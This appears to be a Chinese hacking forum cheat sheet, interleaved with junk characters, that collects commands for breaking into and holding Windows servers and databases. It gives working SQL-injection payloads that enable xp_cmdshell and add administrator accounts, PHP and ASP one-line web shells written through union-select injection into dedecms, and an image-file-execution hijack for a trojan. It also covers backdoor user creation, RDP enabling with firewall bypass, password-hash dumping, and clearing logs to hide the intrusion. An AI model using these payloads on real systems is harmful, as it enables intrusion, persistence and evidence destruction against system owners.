% l) | K2 [% B, E* n/ a; e; J5 J- i
1.net user administrator /passwordreq:no
' ^2 O8 r' y3 `4 W% y0 K, Y这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
/ z( ~1 K. j6 n2.比较巧妙的建克隆号的步骤
# R& [+ C* a7 f( T1 p5 {先建一个user的用户
" U# B; z- q/ J" y然后导出注册表。然后在计算机管理里删掉
; ]: n; i0 `0 ^# u! r在导入,在添加为管理员组
4 @' n: R2 J7 ?3.查radmin密码8 F% R* x5 S7 o" T; R" a
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg8 I0 w) \) {$ B$ J- Q/ X* }
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
6 X2 j4 Z; S; P/ t- @$ Z( ?/ N建立一个"services.exe"的项4 m9 E+ ~% `- u8 F
再在其下面建立(字符串值)5 W; Y7 l. z+ Z/ \& i3 R
键值为mu ma的全路径
7 ?5 f v8 N2 k5.runas /user:guest cmd
{0 G' V9 k6 g% b5 d) {' b测试用户权限!0 O' B$ U) Z6 ]$ r( _
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?7 I) o# ~2 N h' M* i/ u
7.入侵后漏洞修补、痕迹清理,后门置放:
$ l' C2 @, b8 l; X基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门1 L: [% P# Y$ T9 |6 [
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c U% o+ P0 L1 j5 t
, d- j. B8 @! c
for example
2 @+ {6 b% P7 U3 R/ t& _: w- @. S& }5 ]
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'+ N7 z9 E9 p% u0 t& y9 W. u. \
! B8 }9 I6 x p, l/ @- v6 }
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'9 L9 K: x s3 l R a. L
# o' m0 f0 S+ ^. e2 q9:MSSQL SERVER 2005默认把xpcmdshell 给ON了# B" W( r) J) E- f
如果要启用的话就必须把他加到高级用户模式$ A4 I1 t- v& d: p8 r, }- g4 `
可以直接在注入点那里直接注入
/ f( F7 S8 Z* v1 k$ I/ U! eid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--" ~1 h$ ~" i# B" K
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
2 Y& V) ?* E+ S7 |或者. ]1 s( ?+ G( @. x% F
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'- n1 ]6 [; v( g3 |- ^
来恢复cmdshell。9 @5 i% e7 g7 n& G* C6 ?
# e' R; Y- `. v* e6 {- ?" G分析器
- P+ T) L/ {2 O1 TEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--! ~) E! [* {, A+ M1 _
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
' e9 T4 ?; t: T& Z' A, A10.xp_cmdshell新的恢复办法
8 {( ~" w6 S, z0 `xp_cmdshell新的恢复办法: ` J' r2 }/ B+ P" V- K
扩展储存过程被删除以后可以有很简单的办法恢复:
! V# x9 `' T( K6 J0 r* z0 G9 P删除
+ k' T O& O2 L* ?9 ^% Hdrop procedure sp_addextendedproc9 S* Z6 n% z$ o/ K, F1 @5 A
drop procedure sp_oacreate
+ q1 y4 _9 `7 X% a; j4 dexec sp_dropextendedproc 'xp_cmdshell'7 }, S5 D6 g; q+ L8 z1 Z2 P
P' u/ G$ b' v, r; E' r恢复2 g* C" M2 s3 e; `4 d! w1 H
dbcc addextendedproc ("sp_oacreate","odsole70.dll")" k( Z* Y P; r( b4 g F' z. o
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")$ K2 K6 @4 z6 d
+ t O- C# s. w+ M& I& u这样可以直接恢复,不用去管sp_addextendedproc是不是存在# Z3 q- J# l/ v) l' |! | u2 S
0 ?# E5 P, c) \4 j4 u* [% x9 H-----------------------------
" c- `- t4 q8 B1 f; ?1 X
/ I& F9 c ^/ C- X; J删除扩展存储过过程xp_cmdshell的语句:
9 \! D6 B* V" m# _" g& ~exec sp_dropextendedproc 'xp_cmdshell'
+ q: P+ M: W6 }( R* _5 ^
: d2 |: u4 ^7 _* }' q5 k恢复cmdshell的sql语句/ C9 F. e/ O, A8 j5 N" [5 s! I9 B
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
8 n, m8 F0 y0 b- i& R0 X$ ]5 w) Y! Y4 e/ l0 D" t8 F; ^
* L" u4 S/ U2 r; r9 c) I开启cmdshell的sql语句
h. v# f$ U, J7 Q
7 f" i) O c+ Q9 B' v+ Oexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
; E9 u+ d, \7 |2 @* w5 O
: A8 b. ?9 x, c9 u( b) x8 I( X判断存储扩展是否存在! a! Y7 v. b7 C" y6 v: t# k
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
$ f) Q: R2 o2 m% g返回结果为1就ok
9 D" y1 c( R, Q2 H* c& u8 I1 i
2 ^+ l' A' _1 R% B恢复xp_cmdshell6 k; S( Y) Y5 t3 c% f
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'5 o2 J6 L- J6 @6 U
返回结果为1就ok! a+ I# C2 Q: o5 S5 W4 z; V! d
" N% s- M0 d; Q3 t( Y9 o) U# a l: L否则上传xplog7.0.dll
2 D0 N' R& S& J' ^# r, I6 eexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
7 U% l, M5 j1 ?* m# w2 K2 k
! ?3 A" C, s9 q6 C堵上cmdshell的sql语句6 }7 J3 b9 ?+ n/ ~8 M ] T
sp_dropextendedproc "xp_cmdshel3 F$ k6 W# W) G
-------------------------
& m5 B9 n& |0 B( M5 \& Y清除3389的登录记录用一条系统自带的命令:4 N1 i- ^& N3 u3 j
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
1 x. u9 C; @6 u' O( [+ m6 @- A4 c7 I3 c$ X9 J5 L
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件, X7 }+ D- M* F( {9 u( c% W
在 mysql里查看当前用户的权限
2 Q& x! s+ J- x$ x3 `show grants for
$ ?; S" d) B: b) q( [, B" Z$ `1 S% o. {# O7 U% a0 y
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。1 F+ b! I4 n7 U( b
0 t6 ~7 Q- l( a2 H8 \' ?% u! z
\2 `+ D" d) P% G, L1 d& t, x2 S( K
Create USER 'itpro'@'%' IDENTIFIED BY '123';
1 ]7 ?& _) z8 a/ U! W& \, |# K+ K& _9 z- H+ N' ]* H# ?
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
3 W7 q$ c8 Q7 ~, L5 ~6 e( q$ Q; |( O' X; ?0 |
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
- k; G& z3 C" J6 `, u, Z+ M% v9 P0 m i, z( \! Z) m
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
/ Q I. B; W$ ^& G$ d ]4 i& B1 j* ]" N/ s% h. r7 \
搞完事记得删除脚印哟。
5 x N" @( |% K" C% d7 X$ p
$ t, q3 \" M& J6 e; R" o1 }; gDrop USER 'itpro'@'%';' j" W1 \' C3 S. l
% f2 w8 `2 O; Y0 L& n# j
Drop DATABASE IF EXISTS `itpro` ;
+ f+ b# O* b* F* ~, M5 h' M1 U0 B t. B N
当前用户获取system权限- O/ I! A* V. E
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact& _: M! r7 g# U: m
sc start SuperCMD% y6 ^; D5 ]" p' j7 S1 [
程序代码: w$ y# [ o) k6 c: I5 P
<SCRIPT LANGUAGE="VBScript">
4 A7 F4 w( u1 z1 p% i+ @set wsnetwork=CreateObject("WSCRIPT.NETWORK")
5 U! m0 P: q; w! @% Wos="WinNT://"&wsnetwork.ComputerName
$ W7 d/ i: d# e5 C, R T* K1 ~ pSet ob=GetObject(os)$ M! X# w- x/ o2 N% H
Set oe=GetObject(os&"/Administrators,group")
% {1 y. n2 [# n2 j6 a5 n* l' i fSet od=ob.Create("user","nosec")& D+ ~" S, Q; h( t
od.SetPassword "123456abc!@#"& s; D! I2 f; l( {
od.SetInfo4 F+ Q8 P7 B! U1 l5 b
Set of=GetObject(os&"/nosec",user): x' j" v! ]7 V
oe.add os&"/nosec"! W+ @7 Z! a: }& Z& H
</Script>/ }# U5 t* \$ }7 d/ x
<script language=javascript>window.close();</script>1 Z2 v1 p# E& `9 O) E8 a4 C
! Y, C h9 p7 S" ~, J- I* U" i% m3 ?$ S" L% o* ^7 P2 v- ~1 t& y
0 l# s$ [1 [( d) f7 \2 q+ v; v, S- W1 u; @7 [$ x7 q. @1 s
突破验证码限制入后台拿shell) v# _+ G8 R5 K% |1 k( \* ]
程序代码
5 t2 g" [+ T0 @1 g0 R W \+ wREGEDIT4 ' t5 J3 {! _6 g5 K5 u+ q) _. ^
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] , f$ l/ `! P* ~* B, i" n' B6 p( ~
"BlockXBM"=dword:00000000
4 V$ {2 ~& [/ k. L, n
2 Q( l1 s: r5 e2 |/ m6 h, u保存为code.reg,导入注册表,重器IE
2 t" V2 m) j& [7 f0 t' c7 f" O就可以了
7 ]/ U( z2 F1 M# sunion写马
. s0 _+ \' l1 k: q, f) B' i程序代码/ C; Y7 N' g, L2 c" Z! ~+ ?0 r
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
2 \5 p0 S! X9 ]
% O6 x r2 |0 e- r u应用在dedecms注射漏洞上,无后台写马+ |8 I$ }$ `( X' |2 L" S; {8 y
dedecms后台,无文件管理器,没有outfile权限的时候6 x* I4 B- B& ^, ]" K3 C: |9 o7 r
在插件管理-病毒扫描里
; `) ?: b1 W; P0 L5 _$ ]" A3 s写一句话进include/config_hand.php里- b+ L2 a% Q; x
程序代码
9 t( j* T7 Z$ K* M1 z+ d" o7 A>';?><?php @eval($_POST[cmd]);?> V: I; m3 I% n
5 D. x8 U' o2 O C
D+ `* x1 ]6 O& U5 `如上格式
- X! E; A( i2 U6 A( S2 B4 U4 m7 G1 M [. Y& h3 H- e
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解: ]) t5 u9 m% c" Z: |( w- H1 d
程序代码
+ [5 }7 @/ V1 l6 l7 m; B' ?/ k! Aselect username,password from dba_users;/ V9 D% l" F- ~8 A% V- O# v
" ?% N% S! e5 l
1 s/ C# P; A7 l7 q: n& }
mysql远程连接用户
" e, r6 b7 j3 F* v; A程序代码
4 o7 Z. G/ U; b9 t
8 K0 Y4 @% K( C) w! WCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';4 F$ q6 o. w8 d# s. B7 U3 [
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION) E; e3 X9 G5 C5 K" U$ q2 }7 ~2 @
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 06 Z& b4 s. D, U; a, d; V
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;4 ?+ y# _; U. P; n0 ]: n
2 z6 S4 c# j3 H' G5 c
! Q2 g( `, E! l; r, y. ~$ u% p) `6 e6 w# N8 t/ F6 z
; g, f# U# h2 I5 r$ c" xecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
, m6 m! S2 M6 @# D- E7 y+ L- s7 E5 T! O: \& K: j: A/ q, p5 a9 y0 [
1.查询终端端口
k& b4 _0 w7 q r" S( m9 B- U
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
) x# K. u& ]: q- c' c2 B2 I. {* l& B( d* K' E. b) @6 c4 m
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp") ?/ T* H# c' Y5 C$ [
type tsp.reg" O$ {- X& f% }/ D% Q0 V
8 d- C0 k4 W+ ?8 w$ R0 R0 G
2.开启XP&2003终端服务" ?( T9 b/ P7 n+ g" T/ Z. R- _
* K* q: w! X6 q% ~- H( P9 F' \
$ w0 `1 }* q& H# A ?! I5 R
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f2 l7 g: Y s- O, p$ i" _
9 Z2 Z% R+ u! b/ P
, b' \ l( I/ a) D7 [REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
5 o$ X! z7 d) n. `& ]( h4 s& S, d' H
9 b/ }' z; [2 q, }6 d2 P( `3.更改终端端口为20008(0x4E28)4 P# W; Q0 D- _/ u
Q9 i" x; X. w: U2 q) x
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
' A. p- N3 I2 K! P
; O( k8 D8 I; R- {REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
) [/ |: R p# e: e3 Z
7 l- h! {5 I$ \8 u* s4 J4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制; m" G( |- g1 r/ r. m1 v
* T, r2 {* r* ]0 I+ GREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f+ S$ @3 |! k, x$ T5 k$ A+ X) z
. E* z' ]0 L" M, C4 Q- e6 Q3 v
5.开启Win2000的终端,端口为3389(需重启)
V- w! D( Q0 w+ R1 C3 a/ |- Y
4 m+ h$ ~% _( j. X) @echo Windows Registry Editor Version 5.00 >2000.reg
3 H" {0 l2 \% aecho. >>2000.reg+ J5 M. N7 J9 Z0 O% N. l3 ]
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 1 R! _! [, X0 o! q, P2 c
echo "Enabled"="0" >>2000.reg
0 J' V1 S; `( V9 E" Vecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg 9 V0 v2 M% N9 O9 u+ @
echo "ShutdownWithoutLogon"="0" >>2000.reg
. k- v/ v2 Y: x5 L/ X1 Techo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg & P4 {, L% D) l
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg & P; F. b9 `: r8 h) `, ~
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
5 c6 H1 k* o! M I" |echo "TSEnabled"=dword:00000001 >>2000.reg
0 A8 x4 s0 |) J( H, Xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg $ L8 m9 s9 e# {0 V# |9 x2 H
echo "Start"=dword:00000002 >>2000.reg 5 u8 X+ K {9 P2 e* c
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg t: p* ^0 W9 ?- t, b7 o" [9 s; r
echo "Start"=dword:00000002 >>2000.reg 0 x- D( I* S& H1 S1 e
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
0 Z$ k/ U6 ^6 n/ o+ Hecho "Hotkey"="1" >>2000.reg 1 B* W* i/ e: B% Q! H
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg ( K1 l3 D0 W5 E! Q. D; ~( c5 n' `
echo "ortNumber"=dword:00000D3D >>2000.reg $ _, G0 [$ C4 ^1 l* E8 \9 l" A
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
! `/ o( [2 X" T+ Y& Z& v$ D% \2 recho "ortNumber"=dword:00000D3D >>2000.reg
$ n2 p& A0 X1 A$ i, X3 |5 D) x! N) u3 a4 Y5 G
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
0 G5 b! u, V0 {, M, d: l$ f" i
$ Q, y' W/ x9 p9 O7 o9 @@ECHO OFF & cd/d %temp% & echo [version] > restart.inf# ?. O/ G+ v% g1 y1 R' Y
(set inf=InstallHinfSection DefaultInstall), K# k! u' Z$ }
echo signature=$chicago$ >> restart.inf
; q5 @/ p W; j% |( k4 c. Qecho [defaultinstall] >> restart.inf
) |% s" w f: w B; T( e9 lrundll32 setupapi,%inf% 1 %temp%\restart.inf, K. `) q1 g9 a+ G2 D' T
" n. z0 n- G/ O0 i0 h
# \" [5 T$ a c2 D$ V7.禁用TCP/IP端口筛选 (需重启)
! {7 r# A" X% \' X; y
, ^* @' a% n/ HREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
- C8 U6 g$ U3 e1 b3 z b1 \
; {. p: k; q; H( r* `8.终端超出最大连接数时可用下面的命令来连接
4 X( F, c9 a" a; r1 Z3 i; P: g( T4 V F' _
mstsc /v:ip:3389 /console
; R* r# y0 X8 M
* c; P7 e% n8 _, `9.调整NTFS分区权限! S1 ~) @9 U/ E* }
3 n. m/ G0 L; W1 kcacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
; R# o1 K& ^9 q. L. l9 }: r
8 |) E4 {) z8 K! r3 Jcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)$ E2 B9 D4 g5 k. o/ B
. [9 T- e( f0 {4 x
------------------------------------------------------5 F& `! ^! `' r1 Z6 a
3389.vbs
4 J$ ?8 s5 H( q; U, G, m2 `' v4 OOn Error Resume Next- u8 { N. x6 \; @7 y
const HKEY_LOCAL_MACHINE = &H80000002
( Y8 }1 ]- {+ U6 P( k* WstrComputer = "."5 N4 F5 {6 p& I
Set StdOut = WScript.StdOut
/ T) `& H+ H% L+ OSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_& k( w0 X! v- [7 \) H/ [
strComputer & "\root\default:StdRegProv")
& J; Z( ?6 U6 ]& bstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
$ A# H J$ W1 G# R5 Aoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath1 i1 J6 g# y& \: K6 r& Y3 o0 Q. ]) O
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp": G+ E8 n+ Z' ?# c1 p
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
+ j# P6 ]4 ^( C- H( |. j# g3 SstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" ~; ^& L; M/ u; A% o
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
* [; A# B4 M A, w3 O6 T, E: e& YstrValueName = "fDenyTSConnections"% T! }+ i% k+ Q2 Q. l, F4 b; \; _. z
dwValue = 0# S/ P, g5 ?1 ]4 ?
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
6 C. S+ z9 s( R# wstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
7 Z! p2 M, S8 h) g9 VstrValueName = "ortNumber"- p$ b0 m+ r5 ~0 P
dwValue = 3389
! K) c, E, y7 _& coreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue1 d2 B# |: ]4 z5 T* m. U
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"' m& K" K9 v, T4 Z( a; h
strValueName = "ortNumber"
1 Z. w* Z M% CdwValue = 33897 m) o) _8 l" U) z# ^
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue% X. i/ O! @9 Z
Set R = CreateObject("WScript.Shell") 3 Q1 b& L; t7 S4 J4 z# P
R.run("Shutdown.exe -f -r -t 0") & Q1 L5 K5 `; W: a2 I& s, g
* i) x& h: ^2 g* {3 D: U: d
删除awgina.dll的注册表键值8 P2 Y( ~4 K' A4 a g
程序代码
& f, {2 s1 ]" ?+ y, [+ X0 e5 ~( G( i8 U m
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
5 ^1 n$ `( u8 p0 J) D
. Y4 Q5 O% e* I" g$ Q$ }! D1 [1 e3 _
# W, c0 N9 \ B4 i( m
|$ \6 e" }. B$ z/ ]9 Q" a% |' [- t, l
程序代码
* o1 o8 i( V: M7 t( y1 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
/ a+ ^. l! y5 {: |7 M. `% g3 |: ~1 A
设置为1,关闭LM Hash
' b! p6 i8 U8 n' W5 c
. M6 v+ j* K1 N% ]$ {数据库安全:入侵Oracle数据库常用操作命令
. x8 }# ?( ~8 X2 ~最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
" [# V! x) D" i0 e1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。8 e2 C/ }4 Q q) P* Y: S
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
; ~. }' w2 S( |3、SQL>connect / as sysdba ;(as sysoper)或
" }5 V- m, M& {" _/ H$ |connect internal/oracle AS SYSDBA ;(scott/tiger)
2 J+ M6 w) w+ ]6 L8 v- j$ Uconn sys/change_on_install as sysdba;
# {/ \/ { ?, [$ q4 ^$ ?4、SQL>startup; 启动数据库实例2 n' X5 c9 Z" C/ y; i# Z
5、查看当前的所有数据库: select * from v$database;
" L# M4 Y- {5 n% a/ C) s$ bselect name from v$database;( b& P- I9 a3 t5 Z& t+ n
6、desc v$databases; 查看数据库结构字段3 g" v8 J$ D1 [9 w4 c/ N
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
8 z, B* @ _& T* m; \) aSQL>select * from V_$PWFILE_USERS;5 y% O3 i- T" R& s( g: G
Show user;查看当前数据库连接用户6 Y$ S" b0 q; D( A5 E, ?' {0 G0 a
8、进入test数据库:database test;
- `6 Z/ ^. j/ o" E& x9、查看所有的数据库实例:select * from v$instance;3 E2 S! |* E5 o. e" o3 `2 |
如:ora9i9 P$ Z& n- t% j3 W3 w
10、查看当前库的所有数据表:
1 {' y! A6 b# [SQL> select TABLE_NAME from all_tables;
& }% T! @3 [, @ o/ W9 i/ O0 Xselect * from all_tables;
/ v+ }2 u$ |4 }( @& t; I! ~SQL> select table_name from all_tables where table_name like '%u%';" `% k, N8 j# z, M; [1 e2 b! [
TABLE_NAME
L: C! [: b4 k2 G x& p. n------------------------------
& `; n* @3 C# P_default_auditing_options_
' F/ a l, m! t/ P( y& Q% [3 f. [11、查看表结构:desc all_tables;$ X7 J% P' P- _" M" [
12、显示CQI.T_BBS_XUSER的所有字段结构:4 _0 j `6 {# ?2 w" L: ]. J0 g0 j
desc CQI.T_BBS_XUSER;
1 E! [; z& V5 f13、获得CQI.T_BBS_XUSER表中的记录:
6 n3 ?' W/ x; S3 dselect * from CQI.T_BBS_XUSER;
: D8 P e1 ? H; V) _14、增加数据库用户:(test11/test)* [% K5 m3 t) s- j. P! Z* J
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;4 C: W4 O$ R8 H. F/ @, @
15、用户授权:
% D! T$ l* |+ K3 i' W7 ^grant connect,resource,dba to test11;
5 b$ `9 I$ t6 F+ _; `+ L' U+ dgrant sysdba to test11;; P$ ?$ ~" \' T2 \, a% y0 I ^2 e( _
commit;
1 N8 Z. z7 A5 ~" ?+ L( K9 V, S16、更改数据库用户的密码:(将sys与system的密码改为test.)
q7 S1 i6 F/ ealter user sys indentified by test;
7 ~& K# F9 Y3 g& j9 Zalter user system indentified by test;
) X6 {: L* p, q2 |* h O+ q' t+ O/ |+ x$ p' N y& j
applicationContext-util.xml. D( l2 A% U T2 j0 {
applicationContext.xml
. v( c- i. V0 `8 n4 b: x5 \struts-config.xml# h" e0 r9 K; h3 V7 E$ O/ C+ j. z
web.xml
) \8 w. |. M; m# K7 a( pserver.xml2 i6 w8 @2 C6 g; C4 J
tomcat-users.xml5 h/ Q* _! c" E' Q+ J/ U. M
hibernate.cfg.xml7 G, r$ w S0 \! E* G, x2 s. X
database_pool_config.xml
1 x, H- [7 f# V. a6 B7 S8 c' [9 V" I: R1 k- {( y9 D+ E- H
, S* K h, [& ?& W
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
+ P7 p5 e7 R; S# K8 Q" i7 ]8 r\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini$ [. _% o) U* m
\WEB-INF\struts-config.xml 文件目录结构
- C( Q( B$ r8 v2 M7 y% q$ {- L g& \
spring.properties 里边包含hibernate.cfg.xml的名称
" o- F. @2 _# g6 a" N }3 M2 q! I; b; M3 ]4 ~( M& U
6 i9 T9 E/ H+ e/ U; q8 |C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml7 i3 a* b# \- b2 _( R: `
' H$ H- }3 F' _: h
如果都找不到 那就看看class文件吧。。 V2 a7 m7 e4 w
- `: K: L' |4 H9 g
测试1:
" p8 q; H4 L8 e5 DSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
; X8 C' F1 J, ?0 T' C2 U7 [# B1 r( m' A; R) E$ b4 s
测试2:
$ p8 U# s+ _9 G4 |. p5 e
& Q1 y0 o) X1 c! Xcreate table dirs(paths varchar(100),paths1 varchar(100), id int)5 p; K; H' j Q/ Q6 {% w$ J6 \" ~
0 ]8 X& k+ p- E, {: {delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
" ^( U2 C" b4 F1 w* v* V4 A" y' w5 X0 t/ F2 o
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
& x2 a( k2 z M
8 ^: ?) X7 I9 ~查看虚拟机中的共享文件:
1 X9 v4 ^' V! R: d# ^. i在虚拟机中的cmd中执行% s. m% l. }5 b# s; ]. ?% q
\\.host\Shared Folders# e' P7 w; [% ?3 w1 S! t4 @
/ h( q7 ^; k$ A( c5 A+ Ocmdshell下找终端的技巧* k! u/ E- a: N" i* t2 \
找终端: * Q) d. l, n+ x! y. _6 G
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
0 {" ` |1 \6 k" E( w$ i- R. j 而终端所对应的服务名为:TermService & S$ V" k, J; h1 S8 v$ ^
第二步:用netstat -ano命令,列出所有端口对应的PID值! , V, u+ |' j! q B" r
找到PID值所对应的端口# `/ b6 ?) S. a4 M3 M" k5 F' v7 T
& U( f q9 }) r1 ^) ?# U) U
查询sql server 2005中的密码hash" D/ C, W7 H4 A y
SELECT password_hash FROM sys.sql_logins where name='sa'# |9 y& a! i# m2 E
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
, ?: }, i# ?3 Y% G, Y- M$ D/ f; vaccess中导出shell
( v1 V4 s2 [" P d& S0 B5 y* t1 w$ q& a: V6 U, |
中文版本操作系统中针对mysql添加用户完整代码:
